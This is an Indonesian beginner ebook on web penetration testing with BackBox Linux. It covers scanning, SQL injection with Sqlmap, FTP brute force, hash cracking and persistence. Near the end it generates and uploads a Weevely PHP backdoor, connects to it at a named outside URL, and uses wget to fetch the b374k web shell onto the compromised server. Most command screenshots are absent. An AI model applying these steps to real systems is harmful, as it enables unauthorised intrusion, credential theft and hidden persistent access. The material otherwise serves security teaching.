BackBox Linux – Basic Web Penetration Testing
< Web Penetration Testing > < [email protected] >
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Diterbitkan Oleh :
Ebook ini dibuat sebagai media pembelajaran. Segala macam materi yang ada didalam ebook ini adalah bentuk implementasi dari tools yang ada pada BackBox Linux itu sendiri.
Ebook ini bebas untuk disebarluaskan dengan syarat tidak mengubah nama penulis dan isi materi yang ada didalamnya.
Credits
DevilScreaM ([email protected]) Reviewers
Casper ([email protected]) Mbah Roni
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing root@backbox:~# ls DAFTAR ISI Information Gathering • Web Server Scanning with Nmap …...... • Web Server Scanning with WhatWeb …...... Vulnerability Assessment • Web Server Vulnerability Scanning with Nmap …...... • Web Server Vulnerability Scanning with Nikto …...... • WordPress Vulnerability Scanning …...... Exploitation • LFI/RFI with Fimap …...... • SQL Injection with Sqlmap …...... Password Attack • FTP Brute Force with Metasploit …......
• FTP Brute Force with Hydra …......
• FTP Brute Force with Medusa …...... Password Cracking • Hash Identification with Hash-id …...... • Password Cracking with John …......
• Password Cracking with Fang …...... Maintaining Access • Generate Web Backdoor with Weevely …......
• Back Connect with Weevely …......
• Weevely in Action …......
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Information Gathering
Information Gathering atau yang sering disebut Pencarian Informasi adalah untuk mencari informasi yang ada pada sistem operasi target. Ada beberapa tools yang tersedia di BackBox Linux untuk melakukan pencarian informasi pada target. Disini kita akan menggunakan tools • Nmap
• WhatWeb
Dalam penggunaan tools diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Web Server Scanning with Nmap
Nmap adalah sebuah tool open source yang digunakan untuk memeriksa jaringan publik seperti web server ataupun jaringan lokal. Nmap dapat mencari informasi tentang IP, Port, Service yang ada pada sistem operasi web server. Untuk melihat perintah-perintah yang ada pada Nmap gunakan perintah nmap –help Contoh perintah untuk mengetahui informasi yang ada pada web server tersebut
Hasil Scanning dari web server tersebut :
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Keterangan tentang perintah yang dipakai diatas : • sS : Melakukan scanning secara silent atau diam-diam
• sV : Melakukan scanning terhadap software yang membuka port 80 (HTTP)
Pada penggunaan contoh diatas, target yang menjadi sasaran adalah IP 192.168.1.1. disana terlihat jelas bahwa web server tersebut menggunakan Apache 2.4.7 dengan sistem operasi Linux Ubuntu.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Web Server Scanning with WhatWeb
WhatWeb adalah sebuah tool yang digunakan untuk mengetahui beberapa informasi yang ada pada web server. Untuk mengetahui perintah-perintah yang ada pada WhatWeb, gunakan perintah whatweb –help Contoh pencarian informasi web server dengan menggunakan perintah
Hasil dari scanning tersebut adalah
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Keterangan pada perintah yang dipakai tersebut: • v : Target IP Server/Web
Pada contoh diatas yang menjadi target adalah IP 192.168.1.1 dan hasil scanning menyatakan bahwa web server tersebut menggunakan Apache 2.4.7, menggunakan sistem operasi Linux Ubuntu.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Vulnerability Assessment
Memanfaatkan tools pencari celah pada suatu web server. Disini kita dapat menggunakan beberapa tools yang sudah disediakan oleh BackBox Linux, antara lain • Nmap
• Nikto
• WPScan
Dalam penggunaan tools diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Web Server Vulnerability Scanning with Nmap
Nmap adalah sebuah tool open source yang digunakan untuk memeriksa jaringan publik seperti web server ataupun jaringan lokal. Nmap dapat memindai IP, Port, Service yang ada pada sistem operasi web server. Untuk melihat perintah-perintah yang ada pada Nmap gunakan perintah nmap –help Contoh perintah untuk mencari celah pada yang ada di web server
Hasil dari Scanning
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Keterangan pada perintah yang digunakan : • v : Menampilkan Versi-Versi Software
• PN : Semua Host yang online
• sS : Melakukan scanning secara silent atau diam-diam
• sV : Melakukan scanning terhadap software yang membuka port 80 (HTTP)
• script=vuln : Menggunakan Script bawaan dari Nmap yang digunakan mencari celah
Pada contoh diatas terlihat bahwa server tersebut memiliki celah Slowloris DOS Attack, dan SQL Injection yang terdapat pada http://192.168.1.1/?C=S;O=A'%20OR%20sqlspider
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Web Server Vulnerability Scanning with Nikto
Nikto adalah sebuah tool yang dibuat untuk melakukan pengecekkan pada suatu web server apakah web server tersebut terdapat celah ataupun tidak. Untuk melihat perintah-perintah yang ada pada Nikto gunakan perintah nikto –help Contoh perintah penggunaan nikto untuk mencari celah pada web server
Hasil dari Scanning
Keterangan pada perintah-perintah yang digunakan • h : IP Server/Web Target
• p : Port , disini kita menggunakan Port HTTP yaitu 80
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
WordPress Vulnerability Scanning
Disini kita menggunakan tool wpscan yang sudah tersedia di BackBox. Wpscan adalah sebuah tool yang dibuat untuk mencari celah pada sebuah web yang menggunakan Content Management System (CMS) WordPress. Untuk membuka dan menjalankan tool ini, gunakan perintah cd /opt/wpscan/, untuk masuk ke folder dimana wpscan disimpan, lalu jalankan script dengan perintah berikut:
Hasil Scanning
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Keterangan pada perintah-perintah : • --url : IP Server/Web Target
• --enumerate vp : Mencari Celah pada WordPress Plugin
• --enumerate vt : Mencari Celah pada WordPress Themes
Untuk perintah lainnya, gunakan perintah ./wpscan.rb –help
Pada contoh diatas target penulis adalah http://screamav.web.id (situs pribadi penulis) terlihat disana ada beberapa celah yang dapat di eksploit beserta keterangan celah tersebut.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Exploitation
Disini kita memanfaatkan tools yang ada di BackBox untuk melakukan eksploitasi pada web server Disini kita menggunakan beberapa tools untuk melakukan eksploitasi terhadap web yaitu • Fimap
• Sqlmap
Dalam penggunaan tool diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
LFI/RFI with Fimap
Fimap adalah sebuah tool yang digunakan untuk mencoba melakukan injeksi terhadap situs yang terdapat celah LFI atau RFI Contoh Penggunaan Fimap
Hasil Injeksi
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
SQL Injection with Sqlmap
Sqlmap adalah sebuah tool yang paling populer digunakan di linux untuk mencoba melakukan injeksi terhadap celah sql pada suatu web. Tahap pertama • Mendapatkan nama database
untuk mendapatkan database, kita menggunakan perintah -u dan --dbs
Hasil
Kita sudah mendapatkan nama database dari web tersebut, yaitu acuart
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Tahap kedua • Mendapatkan table pada database
Setelah mendapatkan nama database, selanjutnya kita akan mendapatkan table apa saja yang ada pada database web tersebut menggunakan perintah -u dan -D, --tables
Hasil
Table sudah kita dapatkan, yaitu :
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Tahap Ketiga • Melakukan dump dari table dan database
Setelah mendapatkan table yang ada, selanjutnya kita akan mendapatkan kolum apa saja yang ada pada table users tersebut menggunakan perintah -u dan -D, -T –tables
Hasil
Dilihat dari hasil diatas, kita sudah dapat mengetahui apa saja yang dapat dilihat dari hasil dump yang kita gunakan tadi. Keterangan Perintah yang digunakan : • -u : URL Target
• -D / --dbs : Nama Database / Mendapatkan nama database
• -T / --tables : Nama Table / Mendapatkan list table
• --dump : Melakukan Dump data
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Password Attack
Memanfaatkan beberapa tools yang sangat berguna di BackBox untuk melakukan brute force. Disini kita dapat menggunakan beberapa tools, yaitu : • Metasploit (auxiliary/scanner/ftp/ftp_login)
• Hydra
• Medusa
Dalam penggunaan tools diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
FTP Brute Force with Metasploit
Metasploit Framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. Metasploit Framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit. Persiapan • Username List
• Password List
• Target
Jalankan Metasploit
Masukkan perintah berikut untuk menggunakan module auxiliary/scanner/ftp/ftp_login
Lakukan setting terhadap Username List, sebagai contoh penulis membuat username list di /home/devilscream/user.txt menggunakan set USER_FILE
Lakukan setting terhadap Password List, sebagai contoh penulis membuat password list di /home/devilscream/pass.txt menggunakan set PASS_FILE
Setelah itu, tentukan target menggunakan set RHOSTS
Jalankan module
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Hasil Brute Force :
Username dan Password FTP sudah berhasil kita dapatkan.Selanjutnya melakukan uji coba apakah Username dan Password itu bisa dengan perintah ftp ip_server Masukkan Username
Masukkan password
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
FTP Brute Force with Hydra
Hydra adalah sebuah tool yang dibuat untuk melakukan brute force terhadap suatu web melalui Username list dan Password list yang sudah disiapkan user Persiapan • Username List
• Password List
• Target
Contoh penggunaan Hydra : • Sebagai contoh, penulis menyimpan username list di /home/devilscream/user.txt
• Sebagai contoh, penulis menyimpan password list di /home/devilscream/pass.txt
Hasil
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
FTP Brute Force with Medusa
Medusa adalah sebuah open source tool yang dibuat untuk melakukan brute force pada suatu web server. Untuk melihat perintah-perintah apa saja yang ada medusa ini, ketikkan perintah medusa –help Persiapan • Username List
• Password List
• Target
Contoh penggunaan Medusa untuk melakukan brute force pada suatu FTP Server
Hasil
Keterangan perintah-perintah yang digunakan • u : Username List
• p : Password List
• h : Host/Target
• M : Module yang akan digunakan
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Password Cracking
Tahap ini adalah untuk mengetahui password asli dari sebuah website menggunakan beberapa tools yang sudah tersedia di BackBox. Ada beberapa tools yang dapat digunakan yaitu: • Fang
• John The Ripper
Namun sebelum melakukan cracking, kita harus mengidentifikasikan password tersebut menggunakan tipe apa, kita dapat menggunakan tools • Hash-id
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Hash Identification with Hash-id
Pada tahap ini, kita akan melakukan identifikasi menggunakan Hash-id. Hash-id adalah sebuah tool yang digunakan untuk melakukan identifikasi atau cek sebuah tipe password.
Contoh penggunaan Hash-id
Memasukkan hash
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Hasil dari Identifikasi:
Tipe Password yang dapat di identifikasi oleh Hash-id
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Password Cracking with John
John the ripper adalah sebuah tool yang digunakan untuk crack password dengan cepat. John digunakan untuk brute force password (mencoba kemungkinan dari kelemahan password yang dibuat oleh si admin), John the ripper juga dapat crack password windows yang berbentuk LM hashes. Pada kali ini, penulis akan melakukan cracking password dengan hash 21232f297a57a5a743894a0e4a801fc3 Simpan Hash tersebut dengan sebuah file. Contoh penggunaan John untuk melakukan password cracking
Hasil
21232f297a57a5a743894a0e4a801fc3 = admin
Keterangan perintah yang digunakan • wordlist : Word List untuk melakukan cracking
• md5.txt : File hash yang akan di crack
• format : Format hash untuk melakukan cracking
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Password Cracking with Fang
Fang adalah sebuah open source tool yang digunakan untuk melakukan cracking password md5 dengan memanfaatkan fasilitas online cracking password. Pada kali ini, penulis akan melakukan cracking password dengan hash 21232f297a57a5a743894a0e4a801fc3 Contoh penggunaan Fang untuk melakukan Cracking
Hasil
Tool ini menggunakan 5 fasilitas online cracking antara lain: • www.md5decryption.com
• www.md5.gromweb.com
• www.md5pass.info
• www.md5.my-addr.com
• www.stringfunction.com
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Maintaining Access
Maintaining Access adalah tahapan dimana setelah kita mendapatkan akses ke server target dan ingin tetap menguasai server tersebut dengan cara menanam backdoor, trojan,rootkit dan lain-lain. Tool yang kita gunakan pada tahap ini adalah: • Weevely
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Generate Web Backdoor with Weevely
Kita akan membuat sebuah web backdoor menggunakan weevely Weevely adalah sebuah tool backdooring yang digunakan dalam bahasa python dan tersedia di BackBox Linux. Contoh penggunaan weevely untuk membuat sebuah web backdoor
Perhatikan perintah diatas • devilscream : Adalah Password Web Backdoor
• /home/devilscream/backdoor.php : Adalah lokasi dimana kita menyimpan file
Dari contoh diatas, backdoor yang kita buat tadi berada di /home/devilscream/backdoor.php dan menggunakan password devilscream
Selanjutnya upload file tersebut ke web server target.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Back Connect with Weevely
Pada tahap ini, kita akan melakukan Back Connect terhadap web server yang sudah kita tanami web backdoor. Contoh penggunaan perintah untuk melakukan back connecting:
Hasil
Keterangan perintah yang digunakan • http://repo.telkomspeedy.org/backdoor.php: adalah backdoor yang telah di upload
• devilscream : adalah password web backdoor
Jika sudah seperti diatas, artinya kita telah berhasil melakukan Back Connecting ke web server target.
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Weevely in Action
Pada tahap ini, kita akan melakukan aksi apa-apa saja yang bisa dilakukan oleh weevely
1. Download File untuk melakukan download file dari server lain, kita dapat menggunakan perintah wget wget https://b374k-shell.googlecode.com/files/b374k-2.8.php
2. Melihat informasi tentang kernel untuk melihat informasi tentang kernel, kita dapat menggunakan perintah uname -a
3. Melihat File untuk melihat isi dari file, kita dapat menggunakan perintah cat [file]
w ww.newbie-security.or.id BackBox Linux – Basic Web Penetration Testing
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasan dalam ebook ini, tentunya masih banyak kekurangan dan kelemahannya.
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangun kepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan- kesempatan berikutnya. Semoga ebook ini berguna bagi para pembaca ebook ini.
w ww.newbie-security.or.id